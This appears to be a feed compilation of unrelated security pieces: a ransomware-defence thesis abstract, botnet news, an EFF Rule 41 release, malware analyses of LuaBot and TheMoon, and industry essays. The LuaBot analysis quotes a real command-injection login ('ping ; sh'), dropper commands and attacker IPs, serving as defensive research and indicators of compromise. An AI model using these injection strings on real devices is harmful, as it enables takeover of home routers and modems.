In this thesis, we argue that it is possible to extend existing defense mechanisms, and protect user data from a large number of cryptographic ransomware attacks. To support this claim, in the first part of the thesis, we perform an evolutionary-based analysis to understand the destructive behavior of ransomware attacks. We show that by monitoring the interaction of malicious processes with the operating system, it is possible to design practical defense mechanisms that could stop even very successful cryptographic ransomware attacks. In the second part, we propose a novel dynamic analysis system, called Unveil, that is designed to analyze ransomware attacks, and model their interactions. In the third and the last part, we propose an end-point framework, called Redemption, to protect user data from ransomware attacks. We present an operating system-independent design, and also provide implementation details which show that such lightweight solutions could be integrated into existing operating systems while achieving zero data loss in a large number of successful ransomware attacks.

About the Speaker

Amin Kharraz is a PhD student in the Information Assurance program at Northeastern University’s College of Computer and Information Science, advised by Professor Engin Kirda. Amin’s research interests span a wide range of topics in systems security, focusing on operating systems, binary analysis, and malware and botnet detection. He is a member of Northeastern’s Secure Systems Laboratory (SecLab) located in 132 Nightingale Hall.

Before joining Northeastern, Amin was a research assistant at the High Performance Computing Architectures and Networks Laboratory (HPCAN), at Sharif University of Technology, located in Tehran, Iran.

Committee

Professor Engin Kirda, Professor, Interdisciplinary with the College of Computer and Information Science (CCIS) and the College of Engineering (COE) at Northeastern University
Professor William Robertson, Associate Professor, Interdisciplinary with the College of Computer and Information Science (CCIS) and the College of Engineering (COE) at Northeastern University
Professor Long Lu, Professor, College of Copmuter and Information Science (CCIS) at Northeastern University
Professor Manuel Egele, Assistant Professor, Department of Electrical and Computer Engineering (ECE) at Boston University

View on site | Email this event


          #MorningMonarchy: April 18, 2017        
Leaked links, smartphone rehab and a botnet's final bow + this day in history w/the San Francisco earthquake and our song of the day by Royal Blood on your Morning Monarchy for April 18, 2017.
          Un Botnet utilisant le réseau d’anonymisation et les services cachés de Tor         
Secuobs.com : 17/12/2012 - secuobs : Un Botnet utilisant le réseau d’anonymisation et les services cachés de Tor
          Les virus reviennent en trombe, statistiques….        

D’après les statistiques, nous nous rendons compte que le taux de spams semble se stabiliser autour de 55%. Les botnets sont de moins en moins utilisés pour l’envoi des spams. Les virus, par contre, sont en sévère augmentation : ils sont plus nombreux, plus rapides et plus ciblés. Ils nécessitent une attention et une vigilance accrues de la part de tous les utilisateurs.(...)

Article complet : Les virus reviennent en trombe, statistiques….


          Statistiques et évolutions des taux de spams        

Les graphiques ci-dessous représentent le nombre de spams et de virus reçus par Altospam sur l'ensemble du trafic. Le second graphe présente la place en pourcentage du nombre de botnets envoyant des spams sur le nombre total de spams reçus par Altospam.

Le niveau de spam a augmenté de manière significative en mars 2014 en frôlant le ratio de 80% de spams sur le nombre total d'emails reçus par l'ensemble de nos clients.(...)

Article complet : Statistiques et évolutions des taux de spams


          Statistiques sur les botnets        

Pour rappel, les botnets sont des réseaux d’ordinateurs infectés par un logiciel malveillant. Un botnet master  contrôle 'son' botnet à distance sans que les propriétaires des PC infectés en aient connaissance.(...)

Article complet : Statistiques sur les botnets


          EFF Urges Citizens, Websites to Fight Rule Changes Expanding Government Powers to Break Into Users’ Computers        
Changes to Rule 41 Will Greatly Increase Law Enforcement Hacking, Surveillance

San Francisco—The Electronic Frontier Foundation (EFF), the Tor Project, and dozens of other organizations are calling today on citizens and website operators to take action to block a new rule pushed by the U.S. Justice Department that would greatly expand the government’s ability to hack users’ computers and interfere with anonymity on the web.

EFF and over 40 partner organizations are holding a day of action for a new campaign—noglobalwarrants.org—to engage citizens about the dangers of Rule 41 and push U.S. lawmakers to oppose it. The process for updating these rules—which govern federal criminal court processes—was intended to deal exclusively with procedural issues. But this year a U.S. judicial committee approved changes in the rule that will expand judicial authority to grant warrants for government hacking.

“The government is attempting to use a process designed for procedural changes to expand its investigatory powers,” said EFF Activism Director Rainey Reitman. “Make no mistake: these changes to Rule 41 will result in a dramatic increase in government hacking. The government is trying to avoid scrutiny and sneak these new powers past the public and Congress through an obscure administrative process.”

Right now, Rule 41 only authorizes federal magistrate judges to issue warrants to conduct searches in the judicial district where the magistrate is located. The new Rule 41 would for the first time authorize magistrates to issue warrants when “technological means,” like Tor or virtual private networks (VPNs), are obscuring the location of a computer. In these circumstances, the rule changes would authorize warrants to remotely access, search, seize, or copy data on computers, wherever in the world they are located.

“Tor users worldwide could be affected by these new rules,” said Kate Krauss, Director of Public Policy and Communications for the Tor Project. “Tor is used by journalists, members of Congress, diplomats, and human rights activists who urgently need its protection to safeguard their privacy and security—but these rules will give the Justice Department new authority to snoop into their computers."

The changes to Rule 41 would also take the unprecedented step of allowing a court to issue a warrant to hack into the computers of innocent Internet users who are themselves victims of a botnet, EFF and its partners said in a letter to members of Congress today.

EFF and its partners launched noglobalwarrants.org, a campaign page outlining problems with the changes to Rule 41 and listing over 40 Internet companies, digital privacy providers, and public interest groups that support the project. The coalition is asking website owners to embed on their sites unique code that will display a banner allowing people to email members of Congress or sign a petition opposing Rule 41. The groups are also calling on citizens to speak out against Rule 41 on social media and blogs. The aim is to send a message to Congress that it should not authorize this expansion of government hacking and must reject Rule 41 changes.

For the coalition letter:
https://www.eff.org/document/rule-41-coalition-letter

For noglobalwarrants.org:
https://noglobalwarrants.org/

Contact: 
Rainey
Reitman
Activism Director
Mark
Rumold
Senior Staff Attorney

          INFOGRAPHIC: THE DARK SIDE OF THE INTERNET        

wpsCEAB.tmp
If you're browsing online now, what you see is only the surface web, the part most of us are familiar with and where all sites are indexed by search engines and are easily accessible. But it's only the tip of the iceberg, comprising only 10 percent of the total size of the internet. The rest (90 percent) are what is known as the Deep Web, which includes the part that’s 100 percent anonymous: the Dark Web. In simple terms, the Dark Web is the hidden side of the internet. It's an area that evokes images of illegal pornography, black markets, hacking groups, botnet operations (those associated with spam, fraud, and malicious attacks), and the likes. Learn more about this dark, hidden side of the internet from the following infographic by Cartwright King Solicitors.

http://images.sort-cms.co.uk/cartwrightking/The-Dark-Web-final-final.png



          LuaBot: Malware targeting cable modems        
During mid-2015 I disclosed some vulnerabilities affecting multiple ARRIS cable modems. I wrote a blogpost about ARRIS' nested backdoor and detailed some of my cable modem research during the 2015 edition from NullByte Security Conference.

CERT/CC released the Vulnerability Note VU#419568 and it got lots of media coverage. I did not provide any POC's during that time because I was pretty sure that those vulnerabilities were easily wormable... And guess what? Someone is actively exploiting those devices since May/2016.

The malware targets Puma 5 (ARM/Big Endian) cable modems, including the ARRIS TG862 family. The infection happens in multiple stages and the dropper is very similar to many common worm that targets embedded devices from multiple architectures. The final stage is an ARMEB version from the LuaBot Malware.


The ARMEL version from the LuaBot Malware was dissected on a blogpost from Malware Must Die, but this specific ARMEB was still unknown/undetected for the time being. The malware was initially sent to VirusTotal on 2016-05-26 and it still has a 0/0 detection rate.



Cable Modem Security and ARRIS Backdoors

Before we go any further, if you want to learn about cable modem security, grab the slides from my talk "Hacking Cable Modems: The Later Years". The talk covers many aspects of the technology used to manage cable modems, how the data is protected, how the ISPs upgrade the firmwares and so on.


Pay special attention to the slide #86:


I received some reports that malware creators are remotely exploiting those devices in order to dump the modem's configuration and steal private certificates. Some users also reported that those certificates are being sold for bitcoin to modem cloners all around the world. The report from Malware Must Die! also points that the LuaBot is being used for flooding/DDoS attacks.


Exploit and Initial Infection

Luabot malware is part of a bigger botnet targeting embedded devices from multiple architectures. After verifying some infected systems, I noticed that most cable modems were compromised by a command injection in the restricted CLI accessible via the ARRIS Password of The Day Backdoor.

Telnet honeypots like the one from nothink.org have been logging these exploit attempts for some time. They are logging many attempts to bruteforce the username "system" and the password "ping ; sh", but they're, in fact, commands used to escape from the restricted ARRIS telnet shell.


The initial dropper is created by echoing shell commands to the terminal to create a standard ARM ELF.


I have cross compiled and uploaded a few debugging tools to my cross-utils repository, including gdbserver, strace and tcpdump. I also happen to have a vulnerable ARRIS TG862 so I can perform dynamic analysis in a controlled environment.

If you run the dropper using strace to monitor the network syscalls, you can see the initial connection attempt:

./strace -v -s 9999 -e poll,select,connect,recvfrom,sendto -o network.txt ./mw/drop
connect(6, {sa_family=AF_INET, sin_port=htons(4446), sin_addr=inet_addr("46.148.18.122")}, 16) = -1 ENODEV (No such device)

The command is a simple download and exec ARMEB shellcode. The malicious IP 46.148.18.122 is known for bruteforcing SSH servers and trying to exploit Linksys router command injections in the wild. After downloading the second stage malware, the script will echo the following string:
echo -e 61\\\\\\x30ck3r

This pattern is particularly interesting because it is quite similar to the one reported by ProtectWise while Observing Large-Scale Router Exploit Attempts:
cmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

The second stage binary ".nttpd" (MD5 c867d00e4ed65a4ae91ee65ee00271c7) performs some internal checks and creates iptables rules allowing remote access from very specific subnets and blocking external access to ports 8080, 80, 433, 23 and 22:


These rules block external exploit attempts to ARRIS services/backdoors, restricting access to networks controlled by the attacker.

After setting up the rules, two additional binaries were transferred/started by the attacker. The first one, .sox.rslv (889100a188a42369fd93e7010f7c654b) is a simple DNS query tool based on udns 0.4.



The other binary, .sox (4b8c0ec8b36c6bf679b3afcc6f54442a), sets the device's DNS servers to 8.8.8.8 and 8.8.4.4 and provides multiple tunneling functionalities including SOCKS/proxy, DNS and IPv6.



Parts of the code resembles some shadowsocks-libev functionalities and there's an interesting reference to the whrq[.]net domain, which seems to be used as a dnscrypt gateway:



All these binaries are used as auxiliary tools for the LuaBot's final stage, arm_puma5 (061b03f8911c41ad18f417223840bce0), which seems to be selectively installed on vulnerable cable modems.

UPDATE: According to this interview with the supposed malware author, "reversers usually get it wrong and say there’s some modules for my bot, but those actually are other bots, some routers are infected with several bots at once. My bot never had any binary modules and always is one big elf file and sometimes only small <1kb size dropper"


Final Stage: LuaBot

The malware's final stage is a 716KB ARMEB ELF binary, statically linked, stripped and compiled using the same Puma5 toolchain as the one I made available on my cross-utils repository.


If we use strace to perform a dynamic analysis we can see the greetings from the bot's author and the creation of a mutex (bbot_mutex_202613). Then the bot will start listening on port 11833 (TCP) and will try to contact the command and control server at  80.87.205.92.


In order to understand how the malware works, let's mix some manual and dynamic analysis. Time to analyse the binary using IDA Pro and...

Reversing stripped binaries

The binaries are stripped and IDA Pro's F.L.I.R.T. didn't recognize standard function calls for our ARMEB binary. Instead of spending hours manually reviewing the code, we can use @matalaz's diaphora diffing plugin to port all the symbols.

First, we need to export the symbols from uClibC's Puma5 toolchain. Download the prebuilt toolchain here and open the library "armeb-linux\ti-puma5\lib\libuClibc-0.9.29.so" using IDA Pro. Choose File/Script File (Alt+F7), load diaphora.py, select a location to Export IDA Database to SQLite, mark "Export only non-IDA generated functions" and hit OK.

When it finishes, close the current IDA database and open the binary arm_puma5. Rerun the diaphora.py script and now choose a SQLite database to diff against:


After a while, it will show various tabs with all the unmatched functions in both databases, as well as the "Best", "Partial" and "Unreliable" matches tabs.

Browse the "Best matches" tab, right click on the list and select "Import *all* functions" and choose not to relaunch the diffing process when it finishes. Now head to the "Partial matches" tab, delete everything with a low ratio (I removed everything below 0.8), right click in the list and select "Import all data for sub_* function":


The IDA strings window display lots of information related to the Lua scripting language. For this reason, I also cross-compiled Lua to ARMEB, loaded the "lua" binary into IDA Pro and repeated the diffing process with diaphora:


We're almost done now. If you google for some debug messages present on the code, you can find a deleted Pastebin that was cached by Google.



I downloaded the C code (evsocketlib.c), created some dummy structs for everything that wasn't included there and cross-compiled it to ARMEB too. And now what? Diffing again =)



Reversing the malware is way more legible now. There's builtin Lua interpreter and some native code related to event sockets. The list of the botnet commands is stored at 0x8274: bot_daemonize, rsa_verify, sha1, fork, exec, wait_pid, pipe, evsocket, ed25519, dnsparser, struct, lpeg, evserver, evtimer and lfs:


The bot starts by setting up the Lua environment, unpacks the code and then forks, waiting for instructions from the Command and Control server. The malware author packed the lua source code as a GZIP blob, making the entire reversing job easier for us, as we don't have to deal with Lua Bytecode.


The blob at 0xA40B8 contains a standard GZ header with the last modified timestamp from 2016-04-18 17:35:34:


Another easy way to unpack the lua code is to attach the binary to your favorite debugger (gef, of course) and dump the process memory (heap).

First, copy gdbserver to the cable modem, run the malware (arm_puma5) and attach the debugger to the corresponding PID:
./gdbserver --multi localhost:12345 --attach 1058


Then, start gef/GDB and attach it to the running server:
gdb-multiarch -q
set architecture arm
set endian big
set follow-fork-mode child
gef-remote 192.168.100.1:12345


Lastly, list the memory regions and dump the heap:
vmmap
dump memory arm_puma5-heap.mem 0x000c3000 0x000df000


That's it, now you have the full source code from the LuaBot:


The LuaBot source code is composed of several modules:


The bot settings, including the DNS recurser and the CnC settings are hardcoded:


The code is really well documented and it includes proxy checking functions and a masscan log parser:


Bot author is seeding random with /dev/urandom (crypgtographers rejoice):


LuaBot integrates an embedded JavaScript engine and executes scripts signed with the author's RSA key:


Meterpreter is so 2000's, the V7 JavaScript interpreter is named shiterpreter:


There's a catchy function named checkanus.penetrate_sucuri, on what seems to be some sort of bypass for Sucuri's Denial of Service (DDoS) Protection:



LuaBot has its own lua resolver function for DNS queries:


Most of the bot capabilities are in line with the ones described on the Malware Must Die! blogpost. It's interesting to note that the IPs from the CnC server and iptables rules don't overlap, probably because they're using different environments for different bot families (or they were simply updated).

I did not analise the remote botnet structure, but the modular approach and the interoperability of the malware indicates that there's a professional and ongoing effort.


Conclusion

The analysed malware doesn't have any persistence mechanism to survive reboots. It wouldn't try to reflash the firmware or modify volatile partitions (NVRAM for example), but the first stage payload restricts remote access to the device using custom iptables rules.

This is a quite interesting approach because they can quickly masscan the Internet and block external access to those IoT devices and selectively infect them using the final stage payloads.

On 2015, when I initially reported about the ARRIS backdoors, there were over 600.000 vulnerable ARRIS devices exposed on the Internet and 490.000 of them had telnet services enabled:
If we perform the same query nowadays (September/2016) we can see that the number of exposed devices was reduced to approximately 35.000:
I know that the media coverage and the security bulletins contributed to that, but I wonder how much of those devices were infected and had external access restricted by some sort of malware...

The high number of Linux devices with Internet-facing administrative interfaces, the use of proprietary Backdoors, the lack of firmware updates and the ease to craft IoT exploits make them easy targets for online criminals.

IoT botnets are becoming a thing: manufacturers have to start building secure and reliable products, ISPs need to start shipping updated devices/firmwares and the final user has to keep his home devices patched/secured.

We need to find better ways to detect, block and contain this new trend. Approaches like the one from SENRIO can help ISPs and Enterprises to have a better visibility of their IoT ecosystems. Large scale firmware analysis can also contribute and provide a better understanding of the security issues for those devices.


Indicators of Compromise (IOCs)

LuaBot ARMEB Binaries:
  • drop (5deb17c660de9d449675ab32048756ed)
  • .nttpd (c867d00e4ed65a4ae91ee65ee00271c7)
  • .sox (4b8c0ec8b36c6bf679b3afcc6f54442a)
  • .sox.rslv (889100a188a42369fd93e7010f7c654b)
  • .arm_puma5 (061b03f8911c41ad18f417223840bce0)

GCC Toolchains:
  • GCC: (Buildroot 2015.02-git-00879-g9ff11e0) 4.8.4
  • GCC: (GNU) 4.2.0 TI-Puma5 20100224

Dropper and CnC IPs:
  • 46.148.18.122
  • 80.87.205.92

IP Ranges whitelisted by the Attacker:
  • 46.148.18.0/24
  • 185.56.30.0/24
  • 217.79.182.0/24
  • 85.114.135.0/24
  • 95.213.143.0/24
  • 185.53.8.0/24


          Analyzing Malware for Embedded Devices: TheMoon Worm        
All the media outlets are reporting that Embedded Malware is becoming mainstream. This is something totally new and we never heard of this before, right? The high number of Linux SOHO routers with Internet-facing administrative interfaces, the lack of firmware updates and the ease to craft exploits make them a perfect target for online criminals. The Internet of Threats is wildly insecure, but definitely not unpatchable.

To all infosec people out there, it's important to understand these threats and report it properly to the media. Some top-notch researchers recently uncovered "Massive Botnets" infecting refrigerators, microwaves, gaming consoles, soda machines and tamagotchis. The problem is that they never provided any sort of evidence, no malware samples, no IOC's and did not write a Hakin9 article describing it.

Refrigerator Botnet? Revd. Pastor Laphroaig says Show the PoC || GTFO

The aim for this post is to provide more information to identify/execute embedded binaries, describing how to set your own virtual lab. In case you missed it, head to the first post from the "Analyzing and Running binaries from Firmware Images" series.

TheMoon Worm

Johannes from SANS provided me a sample from "TheMoon" malware and posted some interesting information on their handler's diary. Their honeypots captured the scanning activity and linked the exploit to a vulnerable CGI script running on specific firmwares from the following Linksys routers: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000,E900.

SANS handlers classified TheMoon as a Worm because of the self-replicating nature of the malware. The worm searches for a "HNAP1" URL to fingerprint and identify potentially vulnerable routers. If you check your FW and Server logs you may find lot's of different IP's probing this URL.

The worm was named like this because it contains images from the movie "The Moon". It's possible to carve a few PNG's inside the ELF binary:


Identifying the Binary

A total of seven different samples were provided: they all seem to be variants from the same malware due to the ssdeep matching score.


Let's start by running the file utility and readelf to identify the architecture (MIPS R3000 / Little Endian):


The EXr.pdf variant (MD5 88a5c5f9c5de5ba612ec96682d61c7bb) had a VirusTotal Detection Rate of 3 / 50 on 2014-02-16.



QEMU

We'll be using QEMU to run the binaries on a controlled environment. I commonly use two different setups to run MIPS Linux binaries, both based on the Malta platform.

OpenWRT MIPS

OpenWRT Malta CoreLV platform is intended to be used with QEMU (in big or little endian mode). The install procedure is pretty straightforward using OpenWRT Buildroot. OpenWrt Buildroot is the buildsystem for the distribution and it works on Linux, BSD or MacOSX. In case you didn't remember, authors from Carna Botnet used it to cross-compile its binaries.

Installing prerequisites (on your favorite Debian Derivative):

Now head to the openwrt folder and set the proper settings for your Linux Kernel, choosing "MIPS Malta CoreLV board (qemu)" for the Target System and "Little Endian" for the subtarget. Don't forget to save the config.




Now build your image (use the -j switch to speed up if you have multiple cores, e.g "-j 3"):



Your image will be ready after a couple of minutes. Now you need to install QEMU full system emulation binaries and start it with the right command switches:


To exit the console simply hit CTRL+A followed by C and Q.

If you want to connect your emulated machined to a real network, follow the steps from Aurelien's Blog or simply run the following commands to get Internet access:

If you don't want to compile the Kernel by yourself, you can grab the pre-compiled binaries from here or here (at your own risk).

You may remember that it was not possible to run busybox-simet using the standalone qemu-mips-static. It's possible to fix that by manually patching QEMU or you can run it inside the proper virtual machine (OpenWRT Malta MIPS/Big Endian):


Debian MIPS Linux

I won't describe how to set up your Debian MIPS Linux because Zach Cutlip already did an amazing job describing it on this blog post. The process is quite similar to the OpenWRT one and if you're too lazy to build your own environment, Aurelien provides pre-compiled binaries here. Don't forget to set you network connections properly

Dynamic Analysis

In order to emulate the Linksys Environment, let's download and unpack the Firmware from E2500v2 (v1.0.07).

Let's copy and extract the root filesystem (e2500.tar.gz) and the malicious binary (EXr.pdf) to our test machine (Debian MIPS). Remember to copy the worm to the appropriate "/tmp" folder. Backup your QEMU image, start sniffing the connections from the bridged network (tap1 on my case) and bind the necessary pseudo-devices to the chrooted path. You can run the binary directly on your Debian MIPS environment, but using chroot and the target filesystem is highly recommended. If you try to chroot and run the worm without linking these devices, it will refuse to run and it won't drop the second stage binary.

You can use strace to log the syscalls and start your chrooted shell to run the malicious binary. I had some issues using strace on the 2.6.32 Debian MIPS Kernel (vmlinux-2.6.32-5-4kc-malta). The 3.2.0  (vmlinux-3.2.0-4-4kc-malta) version seems to be running fine.



If you don't want to use strace, simply start sh chrooted and run the malware:


The worm tries to remove files containing certain extensions and perform a series of system checks. After a few seconds the binary is removed from /tmp/ and three files are written on the disk: .L26 (PID), .L26.lunar (Lunar Base URL) and .L26.out (Debug log).


It's possible to dump QEMU's physical memory using the pmemsave command by hitting CTRL+A, C (to enter QEMU's administrative interface) and entering:



The 256MB raw dump will be saved on your host's local path. You can now try to use volatility or run strings against it.



The worm starts scanning for ports 80 and 8080 on a hardcoded list of networks. If the /HNAP/ URL returns a string identifying the targeted routers, the malware sends a HTTP POST trying to exploit a command injection on the vulnerable CGI.





Decoded POST:


TheMoon will also start an HTTPS server ("Lunar Base") on the router using the random port identified on the .L26.lunar file. The certificate's Common Name, Organization and Organizational Unit are hardcoded and other values seem to be random. Trying to find these entries on scans.io SSL certificates datasets would be really interesting.


The HTTPS server hosts three files: gerty.png, lunar.png and favicon.ico:




Rkhunter reports a few warnings on the infected system. I have upload the complete output from rkhunter to Pastebin, get it here.


Another useful technique is to compare the contents from the filesystem with a known good template. You can use binwally, WinMerge or binwalk's hashmatch.




Conclusion

I did not spend much time reversing the files and its functions as the main purpose of this post was to provide information to identify and execute embedded binaries, describing how to set your own virtual lab using QEMU.

It's still possible to improve the analysis by faking the nvram, by running a GDB server with QEMU or using Volatility with the proper profile and debugging structures, but this post is already way too long. You should also have a look on Avatar, from EURECOM. Avatar's goal is to enable complex dynamic analysis of embedded firmware in order to assist in a wide range of security-related activities, including malware analysis, reverse engineering and vulnerability discovery.

Let's keep drawing public awareness on the security issues of the Internet of Threats, persuading manufactures, ISP's and final users to collaborate to address these problems.




          Recent Acquisitions In The Security Industry And What It Means For Software Security Professionals        

The recent news of the acquisitions of McAfee by Intel and of Fortify by HP can be interpreted as a future trend for the security industry: build security into hardware and engineering processes instead of bolting security on products. Intel's acquisition of McAfee for example, can be interpreted as move by Intel to integrate application security with hardware (e.g. microchips) that Intel currently develops. Similarly, the acquisition of Fortify Software by HP can be interpreted as a move by HP to integrate software security within HP suite of tools for software testing. Moreover, the news of McAfee acquisition by Intel, can also be interpreted as that the age of companies as pure providers of Antivirus tools has come to an end. This was also predicted by John Kula in his book, Hacking Wall St attacks and countermeasures: ”By the end of 2010, conventional pattern matching anti-virus systems will be completely dead. Their effectiveness will have fallen below 50%."

To understand how signature Anti-Virus (AV) detection and eradication tools have come to age, we need to look at the evolution of security threats in the last two decades and how this affected the effectiveness of AV tools in mitigating the current threats such as cybercrime threats. This is mostly due to the fact that the security threats that consumers and businesses have to protect from today are very different from the ones that they had to protect from ten years ago. In the 90’s the main targets for viruses were users' PC, typical attack vectors included opening unknown email attachments to infect their PCs and spread to the company servers. In 2001 we witnessed the appearance of the first malicious rootkit for the Windows NT: such rootkit had the capability to sneak under the radar of the anti-virus software and evade detection. In 2003 denial of service attacks took advantage of the spreading of worms for infrastructure wide exploitation of buffer overflows such as the SQL slammer worm that caused denial of service to several ATMs at banks such as Bank of America and Washington Mutual. As new signatures were developed to detect and eradicate viruses and worms, the effectiveness of Anti-Virus tools stood on the capacity to identify viruses and worms by the unique signature of the attacks as well as in the capability to eradicate viruses and worms after the infection by patching the infected system. But in 2005, we witnessed email phishing attacks to spread Trojans programs embedded in apparent harmless files eluding anti-virus software and firewalls with the purpose of data exfiltration such as to steal passwords and sensitive data. In 2007, we had the evidence of botnet controlled trojans used as crimeware tool to rob online bank customers, spreading either through targeted phishing attacks or through drive by download infections. More recently, in 2009, Trusteer a security company providing anti-malware solutions published an advisory entitled “Measuring the in-the-wild effectiveness of Antivirus against Zeus” according to which the most popular banker malware Zeus, is successfully bypassing up-to-date antivirus software : "The effectiveness of an up to date anti virus against Zeus is thus not 100%, not 90%, not even 50% - it’s just 23% “.

It is therefore clear in my opinion, that the defenses for malware infection, being this with either viruses, trojans or worms have to be expanded to include other layers of the technology stack that are now the target for rootkits and malware attacks. These expanded layers might include for example, besides the O.S and the application also hardware, kernel and firmware that are currently below the radar of AV detection tools.
Expanding security protection to the hardware layer is beneficial not only as detection control such as for malware intrusion detection but also as security risk preventive controls such as data protection. In the case of cybercrime, malware rootkits such as ZeuS for example that seek to compromise the communication channel between the PC and the banking sites, the malware attacks the client to either hook into the kernel to do Man In The Middle (MiTM) attacks or into the browser APIs to do Man in The Browser (MiTB) attacks. In both cases of these attacks, there is a lot of security to gain at the application layer by protecting the data at the hardware layer. One way to defeat MiTM attacks for example is to secure the communication channel through 2-way mutual authentication and PKI using client identities that are protected by the so called "ID vaults" embedded in hardware chips and secured at firmware layer. Examples of this "ID vaults"are the Broadcom USH Unified Security Hub, that is included in several PCs today and is leveraged by data protection tools such as Verdasys's Digital Guardian data protection solution. You might also consider the benefit of developing application with hardware defenses such as by enforcing firmware controls by digital signing your application at the firmware layer. For the ones of you that attended the talk from Barnaby Jack about jackpotting ATMs at BlackHat this year, signing the application at the firmware layer was one of the mitigations being recommended against rootkit infections.

The other big opportunity for security companies is the integration of security of software with hardware such as in the case of applications for mobile phones. As software is built for the specific mobile O.S. (e.g. Android or iPhone O.S.) can also be build out of the box by leveraging security controls deep in the technology stack that include kernel API, firmware and hardware. In the case of being capable to detect attack vectors, having intrusion detection events that can be triggered at the different layers of the technology stack can leverage defenses at the application layer such as blocking the application to run or transferring data to the server. These are just few examples of security synergies accross layers of the technology stack.

In summary, I think Intel acquisition of McAfee could give Intel the opportunity to design hardware chips that tightly integrate security detection and prevention controls with firmware and software and provide additional layers of security to applications.

The other industry M&A news was the acquisition of Fortify’s software security company by HP: this follows a trend of big software companies such as IBM and HP to acquire security tools companies such as Watchfire and Fortify. Previously, HP grew their security assessment suite of tools through the acquisition of SpyDynamics WebInspect to integrate it in HP's software quality assurance suite of tools, QA inspect. Since IBM previously acquired application scanning tool WatchFire’s Appscan and static analysis tool provider Ounce Labs, Fortify’s static analysis tool acquisition by HP fits the scenario of HP competing head to head with IBM in the software security space. For sake of competition, the acquisition of Fortify by HP make a lot of sense, but the HP acquisition of Fortify also fits the trend in the industry of run software security either as a service or as an assessment integrated as part of the Software Development Life Cycle (SDLC) process.

For example, application and source code vulnerability scanning assessments, referred as dynamic and static testing can be performed a Software Security as a Service (SSaaS) for software development stakeholders such as application architects, developers and testers. These services can also include automation security tools that can be rolled out as part of the overall software development and testing suite of tools such as Integrated Development Environments (IDE) and Q/A testing tools. Obviously, security tool integration with IDE and Q/A testing tools is just one part of the software security equation, as besides tools you also need to roll out secure coding training and secure coding standards. The holistic need of software security that includes people process and technology, is often misunderstood by who has to manage software security initiatives for organizations as software security tools or services alone are mis-interpreted as sufficient to produce secure software.

To produce secure software with a level of software security assurance that is both risk mitigation and cost effective, organizations need to roll out, besides static and dynamic analysis tools and services also software security training for developers and software security engineering processes/methodologies such as SAMM, BSIMM, MS-SDL-Agile, Securosis SSDL, OWASP CLASP.

Obviously, the increased adoption of static and dynamic analysis tools by the enterprise follows the application and software security tool adoption trend. If you refer from a survey from errata security –Integrating Security Info the SDLC http://www.erratasec.com/ErrataSurveyResults.pdf, it is shown for example that static analysis is the most popular activity (57%) followed by manual secure code reviews (51%), manual testing (47%). The trend of adoption of application and software security tools usually follows the enterprise awareness of the application security problem as a software security problem.  At the beginning of the rolling out an application security initiative, companies start from the far right of the SDLC by rolling out application scanning tools and ethical hacking web assessments and then move toward the left of the SDLC with source code analysis. Eventually the awareness of the software security problem moves to the design stage by trying to identify security design flaws earlier in the SDLC with the Application Threat Modeling (ATM). Right now, according to the errata security survey, only 37% of organizations have adopted ATM as part of the SDLC. I believe the trend will lead to that direction of adopting ATM because of the efficiencies and the larger security coverage that ATM will provide. Probably this low ATM adoption can be explained by not enough security awareness yet onto the benefits of ATM as well as the maturity levels reached to seek adoption of ATM within the SLDC.

Software security training for developers is also a trend, 86% of the participants of the survey sent one or more members of the software development team to security training. But again according to the Errata security survey, software security is not yet part of the top list of information security management concerns as only about 1/6 of participants (16%) sends his project managers and InfoSec and AppSec directors to software security process management training.
As the static and dynamic security testing adoption grows in the industry there will be also a need of software security services such as software security training and the development of engineering processes and standards. This trend follows the integration of the organization SDLCs as well as InfoSec/AppSec and Risk management processes with formal software assurance methodologies and activities such as vulnerability assessments, secure coding reviews and secure design review/ application threat modeling.
These trends in the M&A of software security industry will also create new career opportunities. In the case of information security managers for example, there will be a need to hire managers with the right experience and skills in managing software security processes for organizations. In the case of software engineers and security consultants, it will create a need of software engineers and consultants abreast of software security formal methods, static and dynamic analysis tools as well as security assessments such as secure code reviews and application architecture risk analysis and design or application threat modeling. In the case of electrical, software or computer system engineers, the knowledge of hardware and software security could also be leveraged to become an expert in hardware-software security integration such as in the case of the design of hardware embedded application security products/solutions.

In conclusion, as software security practitioner, in your current professional role of information security manager, software security architect, software security consultant, software security trainer/instructor you might look at these industry trends to set your career goals and cultivate the necessary skills and experience that could lead you in new career opportunities being created as results of these security industry trends.

          Looking past the cyber threats of the last decade and the new to come        

Top Cyber Security Risks
 As we pass the first decennial after 2000 we can look back at how IS threats have evolved in the last ten years such as for the complexity of the attacks and the evolution of the attacker's motives.
This is well described by Robert Vamosi on his article on PC world "Top 10 Security Nightmares of the Decade The new threats that will be facing in 2010, according to predictions from a report from McAfee Avert labs will be exploiting of application layer vulnerabilities such as Web 2.0, social networking sites, drive by download, browser vulnerabilities man in the browser,  adobe flash vulnerabilities, mobile phone vulnerabilities, and malware attacks through botnets and banking trojans (e.g. Zeus).

For security practitioners that still think old security school, network security such as secure the perimeter by deploying firewall and IDS (that I pioneered developing at ISS) mitigate threats to the PC/desktop using AV, AS this is the main lesson from the trenches: as threat evolve and rather quickly with increased sophistication, we need new defenses expecially at the application layer to mitigate these new threats. The new defenses need to look at the security of the applications and the data expecially of the transactions and the data flows (end to end from user to application) above all.

There is also a need to look at security control from risk mitigation perspective, keep measures that work (that is risk mitigation to acceptable residual risk) and discard the ones that do not work. One example of a very destructive change in the security industry would be for example to retire all MFA (Multi Factor Authentication) that were adopted in 2006 (mostly to earn a checkmark from FFIEC) and that now just add to the TCO (Tocal Cost of Ownership) since can be easily defeated by malware.

As Einstein said," let's not pretend that things will change if we keep doing the same things". In essence, we are moving to a past information age society where cybercrime threats mitigation need to be the main focus of information security. I believe that we as security practitioners we are about to reach a tipping point: organizations and governments will pay a huge price for fraud and data losses without deploying radically new countermeasures.

My wish for the 2010 is that business organizations and government will put more focus on application security and root causes of vulnerabilities such as insecure software and design. I hope we could put the effort on building new countermeasures at the application layer and use new approaches such as identification of design flaws that account for more than 50% of vulnerabilities such as by using threat modeling (that will be the book I will publish in 2010). My hope is that we recognize that we as security practitioners we are on a time race to win against cybercriminals, we need to work with businesses to roll out new security control and measures. We need to quickly adapt to the new threats and prepare to respond to the cyber threats of the next decade...

          Cybercrime risk mitigation: a critical view of compliance from threat analysis perspective        
